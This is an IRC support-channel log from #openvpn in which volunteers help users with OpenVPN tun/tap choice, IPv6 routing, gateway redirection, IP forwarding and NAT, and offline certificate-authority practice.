[~marcoleps@64-121-192-7.c3-0.eas-ubr2.atw-eas.pa.cable.rcn.com] has quit [Remote host closed the connection] 10:55 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:58 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 10:59 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Read error: Operation timed out] 11:05 -!- zz_AsadH is now known as AsadH 11:05 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 11:06 -!- str8uplinux [~dschuett@mail.lonemountaintruck.com] has left #openvpn [] 11:18 -!- KaiForce [~chatzilla@adsl-70-228-90-247.dsl.akrnoh.ameritech.net] has joined #openvpn 11:22 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 11:29 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:30 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 11:35 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 11:40 -!- amir__ [~amir@unaffiliated/amir] has quit [Ping timeout: 260 seconds] 11:57 -!- AsadH is now known as zz_AsadH 12:02 -!- NuclearMeltdown [~rep@AntiLiberal-1-pt.tunnel.tserv9.chi1.ipv6.he.net] has joined #openvpn 12:08 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 12:22 -!- p3rror [~mezgani@2001:0:53aa:64c:3407:77b8:d673:9b9f] has quit [Ping timeout: 245 seconds] 12:25 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 12:26 -!- p3rror [~mezgani@2001:0:53aa:64c:2835:31c7:d673:9b9f] has joined #openvpn 12:31 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 12:32 < fys> https://sphotos-b.xx.fbcdn.net/hphotos-frc1/526942_10101400289390664_1220964790_n.jpg 12:32 < fys> lmao 12:37 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 12:40 -!- `nand` [~nand@static.102.126.46.78.clients.your-server.de] has quit [Quit: nand] 12:41 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn 12:48 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 248 seconds] 12:51 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 12:53 -!- zz_AsadH is now known as AsadH 13:01 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Quit: ZNC - http://znc.in] 13:05 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] 13:06 -!- b1rkh0ff [~b1rkh0ff@178.77.19.125] has quit [Read error: Connection reset by peer] 13:09 -!- NuclearMeltdown [~rep@AntiLiberal-1-pt.tunnel.tserv9.chi1.ipv6.he.net] has quit [Changing host] 13:09 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has joined #openvpn 13:14 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 13:20 -!- rob0_ [rob0@harrier.slackbuilds.org] has joined #openvpn 13:20 -!- rob0_ [rob0@harrier.slackbuilds.org] has quit [Changing host] 13:20 -!- rob0_ [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn 13:20 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 240 seconds] 13:22 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:24 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 13:24 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 276 seconds] 13:24 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds] 13:25 -!- Netsplit *.net <-> *.split quits: rob0 13:31 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 13:40 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 13:43 <+EugeneKay> fys - #openvpn != #redditrepostsfromtwodaysago 13:47 -!- b1rkh0ff [~b1rkh0ff@178.77.19.125] has joined #openvpn 13:49 -!- novaflash is now known as novaflash_away 13:50 -!- novaflash_away is now known as novaflash 13:51 -!- novaflash is now known as novaflash_away 13:53 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [Ping timeout: 252 seconds] 13:53 -!- novaflash_away is now known as novaflash 14:01 < fys> EugeneKay: Still funny, sir. 14:02 <+EugeneKay> Unfortunatley we're very somber people here 14:04 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 14:12 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 14:15 -!- module000 [~module000@173-10-195-33-BusName-LittleRock.hfc.comcastbusiness.net] has joined #openvpn 14:16 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Quit: Ex-Chat] 14:18 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Remote host closed the connection] 14:23 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Quit: I'm out!] 14:27 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 14:28 < `nand`> Is there anything I can do to optimize the overhead added by OpenVPN? I experience a drop of about 50 kB/s in bandwidth when measuring with nuttcp 14:28 < `nand`> That's with comp-lzo enabled. Disabling lzo increases it slightly, but about 4 kB/s 14:28 < `nand`> but that might just be measuring error 14:32 <@dazo> `nand`: do you use tun or tap? 14:32 < `nand`> dazo: tap 14:32 <@dazo> switch to tun 14:32 <@dazo> tun has lower overhead than tap 14:32 <@dazo> !tunortap 14:32 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 14:32 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 14:33 < `nand`> I'm not sure if that's a possibility for me 14:33 * dazo shrugs 14:33 < `nand`> I'm using it, among other things, as an IPv6 bridge; but my ISP doesn't give my a proper routed block so I proxy the NDP messages instead 14:33 <@dazo> `nand`: openvpn 2.3 supports IPv6 over tun 14:33 < `nand`> I'm guessing those are level 2 14:34 < module000> `nand`: the key part of ipv6 is the "IP" part. i.e.…that's layer3, ergo you are better off to use tun. 14:34 <@dazo> module000: well, before openvpn 2.3, it didn't support IPv6 over tun that easily ;-) 14:35 < `nand`> dazo: I have 2.3.0 on the client, but only 2.1.3 on the server 14:35 <@dazo> `nand`: well ... then you must upgrade your server ... 2.1.3 is way old and no longer maintained by the community 14:46 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 14:47 -!- dazo is now known as dazo_afk 14:48 < `nand`> bleh, switched to debian testing and it still only has 2.2.1 14:48 < `nand`> I really need to move my server to a sane distro. w/e 14:50 < module000> `nand`: if you're using testing, it compiles the latest pretty nicely. I think the only deps i had to install were liblzo-dev and openssl-dev (sp?), and the normal 'build-essential' set of tools 14:51 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 14:51 -!- yuri___ [~cek@crius.pantheon.fused.net] has quit [Ping timeout: 256 seconds] 14:53 < `nand`> needed libpam-dev as well 14:57 -!- satdav [~satdav@firefox/community/satdav] has joined #openvpn 14:57 < satdav> Hello can anyone help me out 14:57 < satdav> with a issue 14:57 < satdav> on debain 14:58 < satdav> when i try to start the service i am getting iptables service not started because of error (SVC_RUN_EXCEPT) 14:59 <@novaflash> satdav: are you using Access Server? 14:59 < module000> satdav: please stop copy/pasting this question into every linux support channel 15:03 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 264 seconds] 15:04 < `nand`> alright, I'm on 2.3 on both sides now; how do I get IPv6 to work over tun instead of tap now? I tried giving both adapters their corresponding IPv6 address (via ‘ifconfig tun0 add ...’) but packets don't get delivered between the two 15:04 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 15:05 < satdav> iptables service not started because of error (SVC_RUN_EXCEPT) 15:05 < satdav> is what i am getting when trying to start the webserver for it 15:05 <@novaflash> satdav: are. 15:05 <@novaflash> satdav: you. 15:05 <@novaflash> satdav: using. 15:05 <@novaflash> satdav: access. 15:05 <@novaflash> satdav: server. 15:06 < satdav> I am trying to enable it on the webapp 15:06 <@ecrist> !as 15:06 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 15:06 <@ecrist> satdav: see that 15:07 < `nand`> hmm, looks like I can route IPv6 packets by using --server-ipv6 with the corresponding prefix 15:07 < `nand`> but the server picks the wrong address for itself. It picks prefix::1 but I want it to use ::2 instead 15:12 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 15:14 < `nand`> alright, I've fixed up the IPs involved, but now I'm not getting IPv6 packets from outside the VPN 15:15 < `nand`> it looks like OpenVPN isn't transmitting NDP packets 15:16 < `nand`> I can disable NDP proxying and set my router to always give a static answer instead, but then anybody could probably overload my system by pinging lots of addresses in that block and exhausting my NDP table 15:16 -!- cek [~cek@crius.pantheon.fused.net] has joined #openvpn 15:17 -!- master_of_master [~master_of@p57B53160.dip.t-dialin.net] has quit [Ping timeout: 256 seconds] 15:17 -!- cek [~cek@crius.pantheon.fused.net] has quit [Client Quit] 15:18 -!- master_of_master [~master_of@p57B53160.dip.t-dialin.net] has joined #openvpn 15:20 < `nand`> I could probably solve this by forgoing ndppd entirely and just setting up exceptions for every new connection. Is there an option to run some script for every new client that connects? 15:21 < `nand`> (and ideally also for clients that disconnect) 15:21 < `nand`> ah, --client-connect 15:24 -!- satdav_ [~satdav@89.207.132.64] has joined #openvpn 15:24 -!- satdav_ is now known as Guest21165 15:28 -!- satdav [~satdav@firefox/community/satdav] has quit [Ping timeout: 272 seconds] 15:34 -!- satdav__ [~satdav@89.207.132.64] has joined #openvpn 15:38 -!- Guest21165 [~satdav@89.207.132.64] has quit [Ping timeout: 272 seconds] 15:40 < `nand`> hmm. There's #ifconfig_pool_remote_ip for the remote IPv4 address, but there doesn't seem to be a corresponding environment variable for IPv6 15:42 < `nand`> https://community.openvpn.net/openvpn/ticket/230 15:42 <@vpnHelper> Title: #230 (IPV6 environment variables missing for client-connect) – OpenVPN Community (at community.openvpn.net) 15:42 < `nand`> Would it be possible to get this fixed any-time soon? I can't think of any workaround 15:43 -!- module000 [~module000@173-10-195-33-BusName-LittleRock.hfc.comcastbusiness.net] has left #openvpn [] 15:47 < satdav__> is it hard to setup this version of openvpn 15:47 < `nand`> heh, maybe I could persist the ifconfig pool to a file and just grep for the username in that. It'd be an awful hack, though 15:47 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 15:50 < `nand`> no, that won't work, it isn't updated immediately :( 15:53 -!- p3rror [~mezgani@2001:0:53aa:64c:2835:31c7:d673:9b9f] has quit [Remote host closed the connection] 15:58 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 15:58 -!- satdav__ is now known as SATDAV 15:58 -!- SATDAV is now known as satdav 15:59 -!- satdav [~satdav@89.207.132.64] has quit [Changing host] 15:59 -!- satdav [~satdav@firefox/community/satdav] has joined #openvpn 15:59 -!- bscalp [~bscalp@cap69-1-82-233-37-6.fbx.proxad.net] has joined #openvpn 16:00 < bscalp> !welcome 16:00 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 16:00 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 16:00 < satdav> !help 16:00 <@vpnHelper> (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. 16:00 < satdav> !support 16:00 < satdav> !list 16:00 <@vpnHelper> Admin, BadWords, Channel, ChannelLogger, Config, Factoids, FloodPrevent, Google, Misc, Owner, Relay, Seen, Services, User, Weather, and Web 16:00 < satdav> !seen 16:00 <@vpnHelper> (seen [] ) -- Returns the last time was seen and what was last seen saying. is only necessary if the message isn't sent on the channel itself. 16:00 < satdav> !relay 16:00 < satdav> !help relay 16:00 <@vpnHelper> Error: There is no command "relay". 16:06 < `nand`> dazo_afk: using tun now, the overhead still seems to be around 60 kB/s 16:06 < `nand`> (this is without lzo) 16:07 < `nand`> I can't really get a good measurement with lzo because apparently the data nuttcp sends is very easy to compress and I unnaturally high figures; but that won't work for anything complicated eg. a video file 16:07 < `nand`> (which makes me wonder why that wasn't the case for tap) 16:10 < `nand`> I switched back to tap and I'm getting identical figures (still without lzo) 16:10 < `nand`> but this way has much less hassle 16:13 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 245 seconds] 16:19 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 16:19 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Operation timed out] 16:19 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:20 -!- bscalp [~bscalp@cap69-1-82-233-37-6.fbx.proxad.net] has quit [Ping timeout: 255 seconds] 16:35 -!- mcp [~mcp@wolk-project.de] has quit [Quit: ZNC - http://znc.sourceforge.net] 16:40 -!- jmontano [~Thunderbi@dsl-emcali-200.29.103.65.emcali.net.co] has joined #openvpn 16:40 < jmontano> !welcome 16:40 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 16:40 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 16:42 < jmontano> !route 16:42 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 16:51 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 16:55 -!- labcoattech [~Imran@cpc4-nott18-2-0-cust11.12-2.cable.virginmedia.com] has joined #openvpn 16:56 < labcoattech> hi all 16:56 < labcoattech> can someone please help me setup openvpn correctly, I have configured it as per instructions from the pfsense 2.0 cookbook, my phone is able to connect to the vpn but it can not see lan 16:57 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 17:18 -!- jmontano [~Thunderbi@dsl-emcali-200.29.103.65.emcali.net.co] has quit [Remote host closed the connection] 17:20 -!- p3rror [~mezgani@2001:0:53aa:64c:2835:31c7:d673:9b9f] has joined #openvpn 17:21 -!- mcp [~mcp@wolk-project.de] has joined #openvpn 17:25 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 17:34 -!- p3rror [~mezgani@2001:0:53aa:64c:2835:31c7:d673:9b9f] has quit [Ping timeout: 245 seconds] 17:35 < labcoattech> how do I create a schedule to start at 7pm and end at 9am? i get an error saying stop time can not be before start time 17:36 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Remote host closed the connection] 17:37 -!- labcoattech [~Imran@cpc4-nott18-2-0-cust11.12-2.cable.virginmedia.com] has left #openvpn [] 17:42 -!- Masxmasx [~IetsVulga@unaffiliated/masxmasx] has joined #openvpn 17:46 < Masxmasx> On the "Your problem is probably firewall", should I enable L2TP passthrough and IPSec Passthrough in my router? 17:52 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 256 seconds] 17:54 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 18:36 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 18:38 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 18:46 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Excess Flood] 18:49 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 19:04 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 255 seconds] 19:08 -!- stormerider [~morgan@c-174-61-209-90.hsd1.wa.comcast.net] has joined #openvpn 19:08 -!- satdav [~satdav@firefox/community/satdav] has quit [Quit: Leaving] 19:09 < stormerider> question... i need my local ovpn client to ignore one of the routes from the vpn server. i see i can do this with "route-nopull". is there an option in the client to specify the routes i do want to use with the vpn config or do i need to configure them through the native mechanism on my router? 19:12 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 19:24 < Cpt-Oblivious> storm, what exactly do you mean? 19:24 < Cpt-Oblivious> So your server is pushing certain routes, but 1 of the clients doesn't waint 1 of the routes, correct? 19:26 -!- adolfomaltez [~taro@190.62.205.97] has joined #openvpn 19:26 < Cpt-Oblivious> If that's what you want, then you should indeed use 'route-nopull', it then ignores all routes that are being pushed to it. If there are other routes the client should know about, then you should just specify those in the client config as well. 19:32 -!- stormerider [~morgan@c-174-61-209-90.hsd1.wa.comcast.net] has quit [Read error: Connection reset by peer] 19:33 -!- stormerider [~morgan@c-174-61-209-90.hsd1.wa.comcast.net] has joined #openvpn 19:33 -!- stormerider [~morgan@c-174-61-209-90.hsd1.wa.comcast.net] has quit [Read error: Connection reset by peer] 19:34 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 19:34 -!- stormerider [~morgan@c-174-61-209-90.hsd1.wa.comcast.net] has joined #openvpn 19:36 -!- stormerider [~morgan@c-174-61-209-90.hsd1.wa.comcast.net] has left #openvpn [] 19:41 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 19:43 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Ping timeout: 252 seconds] 19:45 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 20:18 -!- adolfomaltez [~taro@190.62.205.97] has quit [Ping timeout: 272 seconds] 20:19 -!- adolfomaltez [~taro@190.62.247.125] has joined #openvpn 20:26 < pekster> Masxmasx: OpenVPN is a separate protocol from L2TP and IPSec. It uses a single UDP (or TCP, if configured as such) port and all traffic is sent across it. The firewall comment in our /topic implies many people forget to allow the VPN network through their respective firewalls 20:35 < Valcorb> !howto 20:35 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 20:35 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 20:36 < Valcorb> hello everyone 20:36 < Valcorb> i currently have a Debian VPS 20:36 < Valcorb> and I'm trying to make it an OpenVPN server 20:37 < Valcorb> I'm able to connect to it 20:37 < Valcorb> but once I'm connected, I'm not able to browse nor use the internet 20:37 < Valcorb> here's my conf: http://pastebin.com/ugqkSiky 20:37 < Valcorb> I'm connecting from Windows 7 with OpenVPN 2.3 20:45 -!- raidz is now known as raidz_away 20:45 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 20:48 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 260 seconds] 20:48 -!- Valcorb|| is now known as Valcorb 20:55 < pekster> Valcorb: Unable to browse or use the Internet from the client? There's no gateway redirection being pushed from the server; are you doing any further configuring of routes on the client? 20:56 < pekster> Also, configs with mostly comments and whitespace like that are harder to read; it's better if you pipe your configuration files through a sedscript like the following: 20:56 < pekster> sed -e '/^[#;]/ d' -e '/^$/ d' 20:56 < Valcorb> aha 20:56 < Valcorb> i see 20:56 < Valcorb> well im just unable to use the internet 20:56 < Valcorb> whenever I'm connected to it 20:56 < pekster> Can you post the client config too? (preferably run through the aforementioned sedscript to clean it up) 21:00 < Valcorb> sure 21:00 -!- AsadH is now known as zz_AsadH 21:00 < Valcorb> you want me to include the server IP aswell pekster? 21:01 < pekster> That's not required, although the less you change the easier it is to debug. If you're getting connected, it's not the destination that's the issue 21:02 < Valcorb> yeah true 21:02 < Valcorb> http://pastebin.com/UkSYF5B9 21:03 < pekster> So, nothing special appears to be happening to the gateway after you connect. Unless your local LAN or configured DNS server is within the 10.8.0.0/24 range, there's no reason your network traffic should stop working 21:03 < pekster> Can you ping things by IP? Try 8.8.8.8 (the IP for google DNS) 21:04 < pekster> If that works, try a ping by DNS to say google.com 21:04 < Valcorb> on my VPS or local computer? 21:05 < pekster> It's your client that's having connection issues, right? Do it on that system 21:05 < Valcorb> Yeah client pings fine 21:06 < Valcorb> its a weird issue 21:06 < pekster> Both by IP and DNS? If so, your Internet is working fine on the client... 21:06 < Valcorb> oh 21:06 < Valcorb> im not connected 21:06 < Valcorb> to the server at the moment 21:06 < Valcorb> If i was i wouldn't be here :P 21:06 < pekster> Well, do that first 21:06 < Valcorb> alright 21:06 < Valcorb> damn, brb in 30 minutes 21:19 -!- adolfomaltez [~taro@190.62.247.125] has quit [Ping timeout: 272 seconds] 21:20 < Valcorb> ok im back 21:20 < Valcorb> lets try 21:22 < Valcorb> ok im connected 21:22 < Valcorb> but my IP didn't change 21:23 < Valcorb> pekster: 21:23 < pekster> It won't "change" -- you just get another IP on the VPN segment 21:23 < Valcorb> Yeah 21:23 < Valcorb> but the actual reason I want it for is so my IP would be hidden 21:23 < pekster> !redirect 21:23 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 21:23 <@vpnHelper> http://ircpimps.org/redirect.png 21:24 < Valcorb> i see 21:24 < Valcorb> so i will need redirect-gateway? 21:24 < pekster> And everything else on that flowchart 21:24 < Devastator> As some here might already know, I'm thinking how to handle keys/certs for a "kind of" paranoid setup, this is the last idea I had, if someone can comment about it, here it is: http://codepad.org/Q2ZncsQB 21:24 <@vpnHelper> Title: Plain Text code - 27 lines - codepad (at codepad.org) 21:25 < Valcorb> !def1 21:25 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 21:25 < pekster> Devastator: If that's the same setup you hilighted me on a few days ago, it looks much better. No real need to "erase" the USB stick with the public stuff on it (deleting them might leave them "recoverable", but they are after all public) 21:25 < Devastator> pekster still not perfect, right? heheh 21:26 < pekster> As long as the usb with the private files doen't touch systems besides your CA box, that's fully separate 21:26 < pekster> ie: a compromise (even theft, or loss of a password) does not destroy your PKI 21:26 < pekster> Unless it's your CA storage that was lost/compromised, of course 21:27 < pekster> You might need to revoke the client or server cert due to lack of trust, but the rest of the PKI remains secure and in-tact if an issued keypair falls into the wrong hands 21:27 < Devastator> pekster I read what I did a few times, it doesn't seem to touch anything else but the CA box, but I wanted to be sure by someone else looking at it 21:27 < pekster> Yup 21:28 < Devastator> ok, so I will print it and use as my personal step-by-step until I feel confident enough to throw it away 21:28 < pekster> Remember this does mean you can't generate or update keys without the CA system (which IIRC you were keeping offline) so if you travel away and your cert expires, you're screwed until you can get back to yoru files ;) 21:29 < Devastator> unless I sleep with a CA system copy attached to my body 21:30 < pekster> Keep a gun too, just in case The Man tries to get you ;) 21:30 < pekster> Security is all realtive to what you're defending against 21:30 < Devastator> sure! 21:31 < Devastator> my CA system will be: 1 usb stick with easy-rsa dir, 1 usb stick with a live distro, done, it's offline and portable 21:31 < pekster> I run "much" of my PKI off of an online (and reasonably-well-protected) system. Small portions of it are still offline. I have one PKI that the roots are offline, but I created a sub-CA (and cert under the offline roots that can itself sign) 21:31 -!- adolfomaltez [~taro@190.62.247.125] has joined #openvpn 21:31 < Devastator> I don't have that kind of skill 21:32 < pekster> Again, all depends on what your goals are 21:32 < Devastator> probably my grand son, or even his son 21:32 < pekster> Lots of people just do easy-rsa out of the same online system their server runs on 21:33 < pekster> Nothing wrong with that, but it "opens up" the door to any service (maybe openssh, apache, etc) to let an attacker get into those files and try to brute-force your CA key. Many people don't even try to stop that threat beyond updating the OS 21:33 < Devastator> I just find it.. unsafe, because, as you said the other day, everything is in there 21:33 < pekster> Pick your level of paranoia and stick with it 21:34 < Devastator> I try to do what is considered sane for most real sysadmins 21:34 < Devastator> not fake sysadmins 21:34 < pekster> Online CAs are common, but they're separated based on duty. "Mission critical" stuff for highly secured companies are in vaults with guards and careful logs about each and every access and change 21:35 < pekster> eg: the CAs that sign website certificates have to pass extensive audits to be allowed into OSes and browsers 21:35 < pekster> (and some of them are run by corrupt governments anyway, but I won't go into that today) 21:36 < Devastator> pekster do you know those kinds that install openvpn just to say they have it? I'm trying not to be that kind of person, I'm trying to take advantage of what it provides 21:38 < Devastator> some people still call me crazy for setting up vlans for a 20 user lan 21:39 < Devastator> they ask: why didn't you setup an alias instead? routed your modem and plugged into a switch and used opendns to filter? 21:45 < Devastator> well, I don't know if I making any sense right now heheh 21:46 < pekster> OpenDNS sucks. They violate spec by sending you to their ad-generating domain instead of returning NXDOMAIN. Use GoogleDNS instead. 21:47 -!- _DomY-Dom [~hussainah@94.23.145.51] has joined #openvpn 21:48 < Devastator> nah, right now I'm using dnsmasq + prerouting rule 21:49 < Valcorb> !redirect 21:49 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 21:49 <@vpnHelper> http://ircpimps.org/redirect.png 21:49 < Devastator> but I plan to switch to squid shortly 21:49 < Valcorb> !ipforward 21:49 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 21:49 < Valcorb> !nat 21:49 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 21:50 < Devastator> my point is.. I don't understand how people satisfy themselves with such a "lame" solution imho 21:50 < _DomY-Dom> Hello, I have an interesting query. I am trying to get Viscosity to connect to a openvpn connection through the command-line. I can already do it just by clicking the icon but I wanted to make a bash script for it. I have already identified the process as being http://pastebin.com/C2pt1dEA where the "AAAAA" you see in tmpAAAAA.conf can be random characters and the "BBBB" in "5BBBB" can be random integers. I wanted to know how I could generalise this com 21:51 < Valcorb> !ipforward 21:51 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 21:51 < Valcorb> !linipforward 21:51 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 21:51 < _DomY-Dom> Valcorb: is this for me ? 21:52 < Valcorb> no sorry 21:52 < Valcorb> for me 21:52 < Valcorb> :P 21:52 < Valcorb> need this info to set up my server 21:52 < _DomY-Dom> k 21:52 < _DomY-Dom> any idea how to help me with making my bash script ? 21:52 < _DomY-Dom> Valcorb: ? 21:53 < Valcorb> hmm 21:53 < Valcorb> nope not really, I'm not really experienced with that :/ 21:53 < Valcorb> sorry 21:53 < _DomY-Dom> Valcorb: So as in, when I kill that process in htop, it disconnects the VPN in viscosity. But I want a command for it to be able to connect 21:53 < Valcorb> hmm, maybe pekster knows 21:54 < Valcorb> but i truly have no idea 21:56 < _DomY-Dom> pekster: http://pastebin.com/raw.php?i=ERpP7vLq 21:58 < pekster> Obviously it's generating the config dynamically 21:58 < pekster> Just write your own config file 21:58 < _DomY-Dom> pekster: Yeah, dunno how it looks like though. Also what about the 5BBBB ? 21:58 < pekster> Management password 21:58 < _DomY-Dom> pekster: cause I can't actually view the config file. Why does the "managemen" password change each time ? 21:59 < pekster> Oh, or "management port" I guess. That's not actually a valid port... 21:59 < pekster> See --management in the manpage 21:59 < 